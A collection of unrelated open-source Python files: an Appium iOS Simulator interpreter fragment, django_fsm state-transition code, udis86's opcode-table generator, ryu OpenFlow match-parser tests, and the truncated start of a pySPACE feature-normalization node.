self.instruments_process = Popen(command, stdout=PIPE, stdin=None, stderr=PIPE)
# needed to 'read' from the stdout pipe without blocking waiting for the process to finish
fcntl.fcntl(self.instruments_process.stdout.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)
return self.instruments_process.poll() is None # Should be True
def simulator_state(self):
process_states = {'true': True,
'false': False}
output = check_output(["/usr/bin/osascript", "-e",
"tell application \"System Events\" to (name of processes) contains \"iPhone Simulator\""])
is_running = False
if output:
output = output.strip()
is_running = process_states.get(output)
return is_running
def wait_for_simulator(self, timeout=30):
starttime = time()
while time() - starttime < timeout:
state = self.simulator_state()
if state == True:
self.simulator_is_running = True
return True
else:
sleep(.5)
self.simulator_is_running = False
return False
def wait_for_app(self):
# When we get a response we know the app is alive.
self.proxy('')
# Proxy a command to the simulator
# using a file-based inter-process communication
# between Python and Instruments.
def proxy(self, command, return_raw=False):
self.write_command(command)
response = self.read_response(return_raw)
return response
# Write the command to a file
def write_command(self, command):
# Increment the command index
self.command_index = self.command_index + 1
try:
filename = str(self.command_index) + '-cmd.txt'
filepath = os.path.join(self.temp_dir, filename)
with open(filepath,'w') as file:
file.write(command)
except:
print 'ERROR WRITING COMMAND'
self.command_index = self.command_index - 1
def read_response(self, return_raw=False):
# Wait up to 10 minutes for a response
start_time = time()
output = ''
while time() - start_time < 600:
try:
new_output = self.instruments_process.stdout.read()
new_output = new_output.rstrip('*').lstrip('*') # remove buffer-flusher characters
if self.verbose:
print new_output
output += new_output
if "Fail: The target application appears to have died" in output:
return
if "Script threw an uncaught JavaScript error:" in output:
print output
return
if "END INSTRUCTION SET #" not in output:
sleep(0.1)
continue
xml = output.split('END INSTRUCTION SET #')[0].split('_APPIUM_XML_RESPONSE:')[1]
if self.verbose:
print "got response in", time() - start_time
if return_raw:
return xml
else:
results = []
for item in xml.split('<response>')[1:]:
results.append(item.split('</response>')[0].split(',',1))
return results
except IOError:
pass
sleep(0.1) # relieve the cpu a little
def stop(self):
if not self.is_running():
return
# Tell Instruments to shut down (nicely)
self.proxy('runLoop=false;')
# Kill Instruments if it's not being nice
start_time = time()
while (time() - start_time < 15 and self.instruments_process.poll() == None):
sleep(1)
numRetry = 10
while (numRetry >= 0 and self.instruments_process.poll() is None):
self.instruments_process.terminate()
sleep(1)
numRetry = numRetry - 1
if self.instruments_process.poll() is None:
raise Exception('instruments process did not finish')
# Kill iOS Simulator
call("""/usr/bin/osascript -e 'tell app "iPhone Simulator" to quit'""", shell=True)
sleep(2) # give it some extra time
self.simulator_is_running = False
if __name__ == '__main__':
from interpreter import launch
import argparse
parser = argparse.ArgumentParser(description='An interpreter for sending raw UIAutomation javascript commands to the simulator or a device')
parser.add_argument('app', type=str, help='path to simulators .app file or the bundle_id of the desired target on device')
parser.add_argument('-v', dest='verbose', action="store_true", default=False, help='verbose mode')
parser.add_argument('-U', '--UDID', type=str, help='unique device identifier of the SUT')
args = parser.parse_args()
launch(args.app, args.UDID, args.verbose)
| |
# -*- coding: utf-8 -*-
# pylint: disable=W0212, R0904
"""
State tracking functionality for django models
"""
from collections import defaultdict
from functools import wraps
from django.db import models
from django.utils.functional import curry
from django_fsm.signals import pre_transition, post_transition
# South support; see http://south.aeracode.org/docs/tutorial/part4.html#simple-inheritance
try:
from south.modelsinspector import add_introspection_rules
except ImportError:
pass
else:
add_introspection_rules([], [r"^django_fsm\.db\.fields\.fsmfield\.FSMField"])
add_introspection_rules([], [r"^django_fsm\.db\.fields\.fsmfield\.FSMKeyField"])
class TransitionNotAllowed(Exception):
"""Raise when a transition is not allowed"""
class FSMMeta(object):
"""
Models methods transitions meta information
"""
def __init__(self, field=None):
self.field = field
self.transitions = defaultdict()
self.conditions = defaultdict()
def add_transition(self, source, target, conditions=[]):
if source in self.transitions:
raise AssertionError('Duplicate transition for %s state' % source)
self.transitions[source] = target
self.conditions[source] = conditions
def _get_state_field(self, instance):
"""
Lookup for FSMField in django model instance
"""
if not self.field:
fields = [field for field in instance._meta.fields
if isinstance(field, FSMField) or isinstance(field, FSMKeyField)]
found = len(fields)
if found == 0:
raise TypeError("No FSMField found in model")
elif found > 1:
raise TypeError("More than one FSMField found in model")
self.field = fields[0]
return self.field
def current_state(self, instance):
"""
Return current state of Django model
"""
field_name = self._get_state_field(instance).name
return getattr(instance, field_name)
def next_state(self, instance):
curr_state = self.current_state(instance)
result = None
try:
result = self.transitions[curr_state]
except KeyError:
result = self.transitions['*']
return result
def has_transition(self, instance):
"""
Lookup if any transition exists from current model state
"""
return self.transitions.has_key(self.current_state(instance)) or self.transitions.has_key('*')
def conditions_met(self, instance):
"""
Check if all conditions has been met
"""
state = self.current_state(instance)
if state not in self.conditions:
state = '*'
if all(map(lambda f: f(instance), self.conditions[state])):
return True
return False
def to_next_state(self, instance):
"""
Switch to next state
"""
field_name = self._get_state_field(instance).name
state = self.next_state(instance)
if state:
instance.__dict__[field_name] = state
def transition(field=None, source='*', target=None, save=False, conditions=[]):
"""
Method decorator for mark allowed transition
Set target to None if current state need to be validated and not
changed after function call
"""
# pylint: disable=C0111
def inner_transition(func):
if not hasattr(func, '_django_fsm'):
setattr(func, '_django_fsm', FSMMeta(field=field))
@wraps(func)
def _change_state(instance, *args, **kwargs):
meta = func._django_fsm
if not (meta.has_transition(instance) and meta.conditions_met(instance)):
raise TransitionNotAllowed("Can't switch from state '%s' using method '%s'" % (meta.current_state(instance), func.func_name))
source_state = meta.current_state(instance)
pre_transition.send(
sender = instance.__class__,
instance = instance,
name = func.func_name,
source = source_state,
target = meta.next_state(instance))
result = func(instance, *args, **kwargs)
meta.to_next_state(instance)
if save:
instance.save()
post_transition.send(
sender = instance.__class__,
instance = instance,
name = func.func_name,
source = source_state,
target = meta.current_state(instance))
return result
else:
_change_state = func
if isinstance(source, (list, tuple)):
for state in source:
func._django_fsm.add_transition(state, target, conditions)
else:
func._django_fsm.add_transition(source, target, conditions)
if field:
field.transitions.append(_change_state)
return _change_state
return inner_transition
def can_proceed(bound_method):
"""
Returns True if model in state allows to call bound_method
"""
if not hasattr(bound_method, '_django_fsm'):
raise TypeError('%s method is not transition' % bound_method.im_func.__name__)
meta = bound_method._django_fsm
return meta.has_transition(bound_method.im_self) and meta.conditions_met(bound_method.im_self)
def get_available_FIELD_transitions(instance, field):
curr_state = getattr(instance, field.name)
result = []
for transition in field.transitions:
meta = transition._django_fsm
if meta.has_transition(instance) and meta.conditions_met(instance):
try:
result.append((meta.transitions[curr_state], transition))
except KeyError:
result.append((meta.transitions['*'], transition))
return result
class FSMFieldDescriptor(object):
def __init__(self, field):
self.field = field
def __get__(self, obj, type=None):
if obj is None:
raise AttributeError('Can only be accessed via an instance.')
return obj.__dict__[self.field.name]
def __set__(self, instance, value):
if self.field.protected and self.field.name in instance.__dict__:
raise AttributeError('Direct %s modification is not allowed' % self.field.name)
instance.__dict__[self.field.name] = self.field.to_python(value)
class FSMField(models.Field):
"""
State Machine support for Django model
"""
descriptor_class = FSMFieldDescriptor
def __init__(self, *args, **kwargs):
self.protected = kwargs.pop('protected', False)
kwargs.setdefault('max_length', 50)
super(FSMField, self).__init__(*args, **kwargs)
self.transitions = []
def contribute_to_class(self, cls, name):
super(FSMField,self).contribute_to_class(cls, name)
setattr(cls, self.name, self.descriptor_class(self))
if self.transitions:
setattr(cls, 'get_available_%s_transitions' % self.name, curry(get_available_FIELD_transitions, field=self))
def get_internal_type(self):
return 'CharField'
class FSMKeyField(models.ForeignKey):
"""
State Machine support for Django model
"""
| |
# udis86 - scripts/ud_itab.py
#
# Copyright (c) 2009, 2013 Vivek Thampi
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import sys
from ud_opcode import UdOpcodeTable, UdOpcodeTables, UdInsnDef
class UdItabGenerator:
OperandDict = {
"Av" : [ "OP_A" , "SZ_V" ],
"E" : [ "OP_E" , "SZ_NA" ],
"Eb" : [ "OP_E" , "SZ_B" ],
"Ew" : [ "OP_E" , "SZ_W" ],
"Ev" : [ "OP_E" , "SZ_V" ],
"Ed" : [ "OP_E" , "SZ_D" ],
"Ey" : [ "OP_E" , "SZ_Y" ],
"Eq" : [ "OP_E" , "SZ_Q" ],
"Ez" : [ "OP_E" , "SZ_Z" ],
"Fv" : [ "OP_F" , "SZ_V" ],
"G" : [ "OP_G" , "SZ_NA" ],
"Gb" : [ "OP_G" , "SZ_B" ],
"Gw" : [ "OP_G" , "SZ_W" ],
"Gv" : [ "OP_G" , "SZ_V" ],
"Gy" : [ "OP_G" , "SZ_Y" ],
"Gd" : [ "OP_G" , "SZ_D" ],
"Gq" : [ "OP_G" , "SZ_Q" ],
"Gz" : [ "OP_G" , "SZ_Z" ],
"M" : [ "OP_M" , "SZ_NA" ],
"Mb" : [ "OP_M" , "SZ_B" ],
"Mw" : [ "OP_M" , "SZ_W" ],
"Ms" : [ "OP_M" , "SZ_W" ],
"Md" : [ "OP_M" , "SZ_D" ],
"Mq" : [ "OP_M" , "SZ_Q" ],
"Mdq" : [ "OP_M" , "SZ_DQ" ],
"Mv" : [ "OP_M" , "SZ_V" ],
"Mt" : [ "OP_M" , "SZ_T" ],
"Mo" : [ "OP_M" , "SZ_O" ],
"MbRd" : [ "OP_MR" , "SZ_BD" ],
"MbRv" : [ "OP_MR" , "SZ_BV" ],
"MwRv" : [ "OP_MR" , "SZ_WV" ],
"MwRd" : [ "OP_MR" , "SZ_WD" ],
"MwRy" : [ "OP_MR" , "SZ_WY" ],
"MdRy" : [ "OP_MR" , "SZ_DY" ],
"I1" : [ "OP_I1" , "SZ_NA" ],
"I3" : [ "OP_I3" , "SZ_NA" ],
"Ib" : [ "OP_I" , "SZ_B" ],
"Iw" : [ "OP_I" , "SZ_W" ],
"Iv" : [ "OP_I" , "SZ_V" ],
"Iz" : [ "OP_I" , "SZ_Z" ],
"sIb" : [ "OP_sI" , "SZ_B" ],
"sIz" : [ "OP_sI" , "SZ_Z" ],
"sIv" : [ "OP_sI" , "SZ_V" ],
"Jv" : [ "OP_J" , "SZ_V" ],
"Jz" : [ "OP_J" , "SZ_Z" ],
"Jb" : [ "OP_J" , "SZ_B" ],
"R" : [ "OP_R" , "SZ_RDQ" ],
"C" : [ "OP_C" , "SZ_NA" ],
"D" : [ "OP_D" , "SZ_NA" ],
"S" : [ "OP_S" , "SZ_W" ],
"Ob" : [ "OP_O" , "SZ_B" ],
"Ow" : [ "OP_O" , "SZ_W" ],
"Ov" : [ "OP_O" , "SZ_V" ],
"U" : [ "OP_U" , "SZ_O" ],
"Ux" : [ "OP_U" , "SZ_X" ],
"V" : [ "OP_V" , "SZ_DQ" ],
"Vdq" : [ "OP_V" , "SZ_DQ" ],
"Vqq" : [ "OP_V" , "SZ_QQ" ],
"Vsd" : [ "OP_V" , "SZ_Q" ],
"Vx" : [ "OP_V" , "SZ_X" ],
"H" : [ "OP_H" , "SZ_X" ],
"Hx" : [ "OP_H" , "SZ_X" ],
"Hqq" : [ "OP_H" , "SZ_QQ" ],
"W" : [ "OP_W" , "SZ_DQ" ],
"Wdq" : [ "OP_W" , "SZ_DQ" ],
"Wqq" : [ "OP_W" , "SZ_QQ" ],
"Wsd" : [ "OP_W" , "SZ_Q" ],
"Wx" : [ "OP_W" , "SZ_X" ],
"L" : [ "OP_L" , "SZ_O" ],
"Lx" : [ "OP_L" , "SZ_X" ],
"MwU" : [ "OP_MU" , "SZ_WO" ],
"MdU" : [ "OP_MU" , "SZ_DO" ],
"MqU" : [ "OP_MU" , "SZ_QO" ],
"N" : [ "OP_N" , "SZ_Q" ],
"P" : [ "OP_P" , "SZ_Q" ],
"Q" : [ "OP_Q" , "SZ_Q" ],
"AL" : [ "OP_AL" , "SZ_B" ],
"AX" : [ "OP_AX" , "SZ_W" ],
"eAX" : [ "OP_eAX" , "SZ_Z" ],
"rAX" : [ "OP_rAX" , "SZ_V" ],
"CL" : [ "OP_CL" , "SZ_B" ],
"CX" : [ "OP_CX" , "SZ_W" ],
"eCX" : [ "OP_eCX" , "SZ_Z" ],
"rCX" : [ "OP_rCX" , "SZ_V" ],
"DL" : [ "OP_DL" , "SZ_B" ],
"DX" : [ "OP_DX" , "SZ_W" ],
"eDX" : [ "OP_eDX" , "SZ_Z" ],
"rDX" : [ "OP_rDX" , "SZ_V" ],
"R0b" : [ "OP_R0" , "SZ_B" ],
"R1b" : [ "OP_R1" , "SZ_B" ],
"R2b" : [ "OP_R2" , "SZ_B" ],
"R3b" : [ "OP_R3" , "SZ_B" ],
"R4b" : [ "OP_R4" , "SZ_B" ],
"R5b" : [ "OP_R5" , "SZ_B" ],
"R6b" : [ "OP_R6" , "SZ_B" ],
"R7b" : [ "OP_R7" , "SZ_B" ],
"R0w" : [ "OP_R0" , "SZ_W" ],
"R1w" : [ "OP_R1" , "SZ_W" ],
"R2w" : [ "OP_R2" , "SZ_W" ],
"R3w" : [ "OP_R3" , "SZ_W" ],
"R4w" : [ "OP_R4" , "SZ_W" ],
"R5w" : [ "OP_R5" , "SZ_W" ],
"R6w" : [ "OP_R6" , "SZ_W" ],
"R7w" : [ "OP_R7" , "SZ_W" ],
"R0v" : [ "OP_R0" , "SZ_V" ],
"R1v" : [ "OP_R1" , "SZ_V" ],
"R2v" : [ "OP_R2" , "SZ_V" ],
"R3v" : [ "OP_R3" , "SZ_V" ],
"R4v" : [ "OP_R4" , "SZ_V" ],
"R5v" : [ "OP_R5" , "SZ_V" ],
"R6v" : [ "OP_R6" , "SZ_V" ],
"R7v" : [ "OP_R7" , "SZ_V" ],
"R0z" : [ "OP_R0" , "SZ_Z" ],
"R1z" : [ "OP_R1" , "SZ_Z" ],
"R2z" : [ "OP_R2" , "SZ_Z" ],
"R3z" : [ "OP_R3" , "SZ_Z" ],
"R4z" : [ "OP_R4" , "SZ_Z" ],
"R5z" : [ "OP_R5" , "SZ_Z" ],
"R6z" : [ "OP_R6" , "SZ_Z" ],
"R7z" : [ "OP_R7" , "SZ_Z" ],
"R0y" : [ "OP_R0" , "SZ_Y" ],
"R1y" : [ "OP_R1" , "SZ_Y" ],
"R2y" : [ "OP_R2" , "SZ_Y" ],
"R3y" : [ "OP_R3" , "SZ_Y" ],
"R4y" : [ "OP_R4" , "SZ_Y" ],
"R5y" : [ "OP_R5" , "SZ_Y" ],
"R6y" : [ "OP_R6" , "SZ_Y" ],
"R7y" : [ "OP_R7" , "SZ_Y" ],
"ES" : [ "OP_ES" , "SZ_NA" ],
"CS" : [ "OP_CS" , "SZ_NA" ],
"DS" : [ "OP_DS" , "SZ_NA" ],
"SS" : [ "OP_SS" , "SZ_NA" ],
"GS" : [ "OP_GS" , "SZ_NA" ],
"FS" : [ "OP_FS" , "SZ_NA" ],
"ST0" : [ "OP_ST0" , "SZ_NA" ],
"ST1" : [ "OP_ST1" , "SZ_NA" ],
"ST2" : [ "OP_ST2" , "SZ_NA" ],
"ST3" : [ "OP_ST3" , "SZ_NA" ],
"ST4" : [ "OP_ST4" , "SZ_NA" ],
"ST5" : [ "OP_ST5" , "SZ_NA" ],
"ST6" : [ "OP_ST6" , "SZ_NA" ],
"ST7" : [ "OP_ST7" , "SZ_NA" ],
"NONE" : [ "OP_NONE" , "SZ_NA" ],
}
#
# opcode prefix dictionary
#
PrefixDict = {
"rep" : "P_str",
"repz" : "P_strz",
"aso" : "P_aso",
"oso" : "P_oso",
"rexw" : "P_rexw",
"rexb" : "P_rexb",
"rexx" : "P_rexx",
"rexr" : "P_rexr",
"vexl" : "P_vexl",
"vexw" : "P_vexw",
"seg" : "P_seg",
"inv64" : "P_inv64",
"def64" : "P_def64",
"cast" : "P_cast",
}
MnemonicAliases = ( "invalid", "3dnow", "none", "db", "pause" )
def __init__(self, tables):
self.tables = tables
self._insnIndexMap, i = {}, 0
for insn in tables.getInsnList():
self._insnIndexMap[insn], i = i, i + 1
self._tableIndexMap, i = {}, 0
for table in tables.getTableList():
self._tableIndexMap[table], i = i, i + 1
def getInsnIndex(self, insn):
assert isinstance(insn, UdInsnDef)
return self._insnIndexMap[insn]
def getTableIndex(self, table):
assert isinstance(table, UdOpcodeTable)
return self._tableIndexMap[table]
def getTableName(self, table):
return "ud_itab__%d" % self.getTableIndex(table)
def genOpcodeTable(self, table, isGlobal=False):
"""Emit Opcode Table in C.
"""
self.ItabC.write( "\n" );
if not isGlobal:
self.ItabC.write('static ')
self.ItabC.write( "const uint16_t %s[] = {\n" % self.getTableName(table))
for i in range(table.size()):
if i > 0 and i % 4 == 0:
self.ItabC.write( "\n" )
if i % 4 == 0:
self.ItabC.write( " /* %2x */" % i)
e = table.entryAt(i)
if e is None:
self.ItabC.write("%12s," % "INVALID")
elif isinstance(e, UdOpcodeTable):
self.ItabC.write("%12s," % ("GROUP(%d)" % self.getTableIndex(e)))
elif isinstance(e, UdInsnDef):
self.ItabC.write("%12s," % self.getInsnIndex(e))
self.ItabC.write( "\n" )
self.ItabC.write( "};\n" )
def genOpcodeTables(self):
tables = self.tables.getTableList()
for table in tables:
self.genOpcodeTable(table, table is self.tables.root)
def genOpcodeTablesLookupIndex(self):
self.ItabC.write( "\n\n" );
self.ItabC.write( "struct ud_lookup_table_list_entry ud_lookup_table_list[] = {\n" )
for table in self.tables.getTableList():
f0 = self.getTableName(table) + ","
f1 = table.label() + ","
f2 = "\"%s\"" % table.meta()
self.ItabC.write(" /* %03d */ { %s %s %s },\n" %
(self.getTableIndex(table), f0, f1, f2))
self.ItabC.write( "};" )
def genInsnTable( self ):
self.ItabC.write( "struct ud_itab_entry ud_itab[] = {\n" );
for insn in self.tables.getInsnList():
opr_c = [ "O_NONE", "O_NONE", "O_NONE", "O_NONE" ]
pfx_c = []
opr = insn.operands
for i in range(len(opr)):
if not (opr[i] in self.OperandDict.keys()):
print("error: invalid operand declaration: %s\n" % opr[i])
opr_c[i] = "O_" + opr[i]
opr = "%s %s %s %s" % (opr_c[0] + ",", opr_c[1] + ",",
opr_c[2] + ",", opr_c[3])
for p in insn.prefixes:
if not ( p in self.PrefixDict.keys() ):
print("error: invalid prefix specification: %s \n" % pfx)
pfx_c.append( self.PrefixDict[p] )
if len(insn.prefixes) == 0:
pfx_c.append( "P_none" )
pfx = "|".join( pfx_c )
self.ItabC.write( " /* %04d */ { UD_I%s %s, %s },\n" \
% ( self.getInsnIndex(insn), insn.mnemonic + ',', opr, pfx ) )
self.ItabC.write( "};\n" )
def getMnemonicsList(self):
mnemonics = self.tables.getMnemonicsList()
mnemonics.extend(self.MnemonicAliases)
return mnemonics
def genMnemonicsList(self):
mnemonics = self.getMnemonicsList()
self.ItabC.write( "\n\n" );
self.ItabC.write( "const char* ud_mnemonics_str[] = {\n " )
self.ItabC.write( ",\n ".join( [ "\"%s\"" % m for m in mnemonics ] ) )
self.ItabC.write( "\n};\n" )
def genItabH( self, filePath ):
self.ItabH = open( filePath, "w" )
# Generate Table Type Enumeration
self.ItabH.write( "#ifndef UD_ITAB_H\n" )
self.ItabH.write( "#define UD_ITAB_H\n\n" )
self.ItabH.write("/* itab.h -- generated by udis86:scripts/ud_itab.py, do no edit */\n\n")
# table type enumeration
self.ItabH.write( "/* ud_table_type -- lookup table types (see decode.c) */\n" )
self.ItabH.write( "enum ud_table_type {\n " )
enum = UdOpcodeTable.getLabels()
self.ItabH.write( ",\n ".join( enum ) )
self.ItabH.write( "\n};\n\n" );
# mnemonic enumeration
self.ItabH.write( "/* ud_mnemonic -- mnemonic constants */\n" )
enum = "enum ud_mnemonic_code {\n "
enum += ",\n ".join( [ "UD_I%s" % m for m in self.getMnemonicsList() ] )
enum += ",\n UD_MAX_MNEMONIC_CODE"
enum += "\n} UD_ATTR_PACKED;\n"
self.ItabH.write( enum )
self.ItabH.write( "\n" )
self.ItabH.write( "extern const char * ud_mnemonics_str[];\n" )
self.ItabH.write( "\n#endif /* UD_ITAB_H */\n" )
self.ItabH.close()
def genItabC(self, filePath):
self.ItabC = open(filePath, "w")
self.ItabC.write("/* itab.c -- generated by udis86:scripts/ud_itab.py, do no edit")
self.ItabC.write(" */\n");
self.ItabC.write("#include \"decode.h\"\n\n");
self.ItabC.write("#define GROUP(n) (0x8000 | (n))\n")
self.ItabC.write("#define INVALID %d\n\n" % self.getInsnIndex(self.tables.invalidInsn))
self.genOpcodeTables()
self.genOpcodeTablesLookupIndex()
#
# Macros defining short-names for operands
#
self.ItabC.write("\n\n/* itab entry operand definitions (for readability) */\n");
operands = self.OperandDict.keys()
operands = sorted(operands)
for o in operands:
self.ItabC.write("#define O_%-7s { %-12s %-8s }\n" %
(o, self.OperandDict[o][0] + ",", self.OperandDict[o][1]));
self.ItabC.write("\n");
self.genInsnTable()
self.genMnemonicsList()
self.ItabC.close()
def genItab( self, location ):
self.genItabC(os.path.join(location, "itab.c"))
self.genItabH(os.path.join(location, "itab.h"))
def usage():
print("usage: ud_itab.py <optable.xml> <output-path>")
def main():
if len(sys.argv) != 3:
usage()
sys.exit(1)
tables = UdOpcodeTables(xml=sys.argv[1])
itab = UdItabGenerator(tables)
itab.genItab(sys.argv[2])
if __name__ == '__main__':
main()
| |
# Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
# Copyright (C) 2013 YAMAMOTO Takashi <yamamoto at valinux co jp>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
# Python 3
from functools import reduce
except ImportError:
# Python 2
pass
import sys
import unittest
from nose.tools import eq_
from nose.tools import ok_
from ryu.ofproto import ofproto_v1_2
from ryu.ofproto import ofproto_v1_3
from ryu.ofproto import ofproto_v1_2_parser
from ryu.ofproto import ofproto_v1_3_parser
from ryu.tests import test_lib
class Test_Parser_OFPMatch(unittest.TestCase):
_ofp = {ofproto_v1_2_parser: ofproto_v1_2,
ofproto_v1_3_parser: ofproto_v1_3}
def __init__(self, methodName):
print('init %s' % methodName)
super(Test_Parser_OFPMatch, self).__init__(methodName)
def setUp(self):
pass
def tearDown(self):
pass
def _test(self, name, ofpp, d, domask):
if domask:
d = dict(self._ofp[ofpp].oxm_normalize_user(k, uv)
for (k, uv)
in d.iteritems())
match = ofpp.OFPMatch(**d)
b = bytearray()
match.serialize(b, 0)
match2 = match.parser(buffer(b), 0)
for k, v in d.iteritems():
ok_(k in match)
ok_(k in match2)
eq_(match[k], v)
eq_(match2[k], v)
for k, v in match.iteritems():
ok_(k in d)
eq_(d[k], v)
for k, v in match2.iteritems():
ok_(k in d)
eq_(d[k], v)
def _add_tests():
import functools
import itertools
class Field(object):
@classmethod
def generate_mask(cls):
return list(cls.generate())[1]
class Int1(Field):
@staticmethod
def generate():
yield 0
yield 0xff
class Int2(Field):
@staticmethod
def generate():
yield 0
yield 0x1234
yield 0xffff
class Int3(Field):
@staticmethod
def generate():
yield 0
yield 0x123456
yield 0xffffff
class Int4(Field):
@staticmethod
def generate():
yield 0
yield 0x12345678
yield 0xffffffff
class Int8(Field):
@staticmethod
def generate():
yield 0
yield 0x123456789abcdef0
yield 0xffffffffffffffff
class Mac(Field):
@staticmethod
def generate():
yield '00:00:00:00:00:00'
yield 'f2:0b:a4:7d:f8:ea'
yield 'ff:ff:ff:ff:ff:ff'
class IPv4(Field):
@staticmethod
def generate():
yield '0.0.0.0'
yield '192.0.2.1'
yield '255.255.255.255'
class IPv6(Field):
@staticmethod
def generate():
yield '::'
yield 'fe80::f00b:a4ff:fed0:3f70'
yield 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff'
class B64(Field):
@staticmethod
def generate():
yield 'aG9nZWhvZ2U='
yield 'ZnVnYWZ1Z2E='
ofpps = [ofproto_v1_2_parser, ofproto_v1_3_parser]
common = [
('in_port', Int4),
('in_phy_port', Int4),
('metadata', Int8),
('eth_dst', Mac),
('eth_src', Mac),
('eth_type', Int2),
('vlan_vid', Int2),
('vlan_pcp', Int1),
('ip_dscp', Int1),
('ip_ecn', Int1),
('ip_proto', Int1),
('ipv4_src', IPv4),
('ipv4_dst', IPv4),
('tcp_src', Int2),
('tcp_dst', Int2),
('udp_src', Int2),
('udp_dst', Int2),
('sctp_src', Int2),
('sctp_dst', Int2),
('icmpv4_type', Int1),
('icmpv4_code', Int1),
('arp_op', Int2),
('arp_spa', IPv4),
('arp_tpa', IPv4),
('arp_sha', Mac),
('arp_tha', Mac),
('ipv6_dst', IPv6),
('ipv6_src', IPv6),
('ipv6_flabel', Int3),
('icmpv6_type', Int1),
('icmpv6_code', Int1),
('ipv6_nd_target', IPv6),
('ipv6_nd_sll', Mac),
('ipv6_nd_tll', Mac),
('mpls_label', Int3),
('mpls_tc', Int1),
('field_100', B64),
]
L = {}
L[ofproto_v1_2_parser] = common + [
# OF1.2 doesn't have OXM_OF_PBB_ISID.
# OFPXMC_OPENFLOW_BASIC = 0x8000
# OXM_OF_PBB_ISID = 37
# (OFPXMC_OPENFLOW_BASIC << 7) + OXM_OF_PBB_ISID == 4194341
('field_4194341', B64),
]
L[ofproto_v1_3_parser] = common + [
('pbb_isid', Int3),
('tunnel_id', Int8),
('ipv6_exthdr', Int2),
]
def flatten_one(l, i):
if isinstance(i, tuple):
return l + flatten(i)
else:
return l + [i]
flatten = lambda l: reduce(flatten_one, l, [])
for ofpp in ofpps:
for n in range(1, 3):
for C in itertools.combinations(L[ofpp], n):
l = [1]
keys = []
clss = []
for (k, cls) in C:
l = itertools.product(l, cls.generate())
keys.append(k)
clss.append(cls)
l = map(lambda x: flatten(x)[1:], l)
for domask in [True, False]:
for values in l:
if domask:
values = [(value, cls.generate_mask())
for (cls, value)
in zip(clss, values)]
d = dict(zip(keys, values))
mod = ofpp.__name__.split('.')[-1]
method_name = 'test_' + mod
if domask:
method_name += '_mask'
for k in sorted(dict(d).keys()):
method_name += '_' + str(k)
method_name += '_' + str(d[k])
method_name = method_name.replace(':', '_')
method_name = method_name.replace('.', '_')
method_name = method_name.replace('(', '_')
method_name = method_name.replace(')', '_')
method_name = method_name.replace(',', '_')
method_name = method_name.replace("'", '_')
method_name = method_name.replace(' ', '_')
def _run(self, name, ofpp, d, domask):
print('processing %s ...' % name)
self._test(name, ofpp, d, domask)
print('adding %s ...' % method_name)
f = functools.partial(_run, name=method_name,
ofpp=ofpp, d=d, domask=domask)
test_lib.add_method(Test_Parser_OFPMatch,
method_name, f)
_add_tests()
| |
""" Normalize :class:`~pySPACE.resources.data_types.feature_vector.FeatureVector`
"""
import os
import cPickle
import scipy.stats
import numpy
from collections import defaultdict
from pySPACE.missions.nodes.base_node import BaseNode
from pySPACE.resources.data_types.feature_vector import FeatureVector
from pySPACE.tools.filesystem import create_directory
from pySPACE.missions.nodes.decorators import UniformParameter, \
BooleanParameter, ChoiceParameter
class InconsistentFeatureVectorsException(Exception):
pass
class FeatureNormalizationNode(BaseNode):
""" General node for Feature Normalization
The node should simply shift the data with the *translation* variable and
afterwards scale it with the *mult* variable.
This transformation can be loaded and stored
and given to visualization tools.
When used as a standalone node, loading a transformation is mandatory
because the *translation* and *mult* variables are otherwise not
available.
**Parameter**
:load_path:
An absolute path from which the normalization vectors are loaded.
If not specified, these vectors are learned from the training data.
(*optional, default: None*)
**Exemplary Call**
.. code-block:: yaml
-
node : FeatureNormalizationNode
parameters :
load_path: "/Users/mustermann/proj/examples/FN.pickle"
.. warning:: This base node only works alone, when load_path is specified.
:input: FeatureVector
:output: FeatureVector
:Author: Mario Krell (mario.krell@dfki.de)
:Created: 2012/03/28
"""
def __init__(self, load_path = None, **kwargs):
self.load_path = load_path
super(FeatureNormalizationNode, self).__init__(**kwargs)
self.set_permanent_attributes(samples = [], feature_names = [],
load_path = load_path,
feature_indices = None,
tolerance = 10**-9)
def is_trainable(self):
return self.load_path == None
def get_own_transformation(self, sample=None):
return (self.mult, -self.translation*self.mult,self.feature_names, "feature normalization")
def store_state(self, result_dir, index=None):
""" Stores transformation and feature names in the given directory *result_dir* """
if self.store:
node_dir = os.path.join(result_dir, self.__class__.__name__)
# self.__class__.__name__)
create_directory(node_dir)
name = "%s_sp%s.pickle" % ("FN", self.current_split)
result_file = open(os.path.join(node_dir, name), "wb")
result_file.write(cPickle.dumps((self.translation,
self.mult,
self.feature_names), protocol=2))
result_file.close()
super(FeatureNormalizationNode,self).store_state(result_dir)
def _train(self, data):
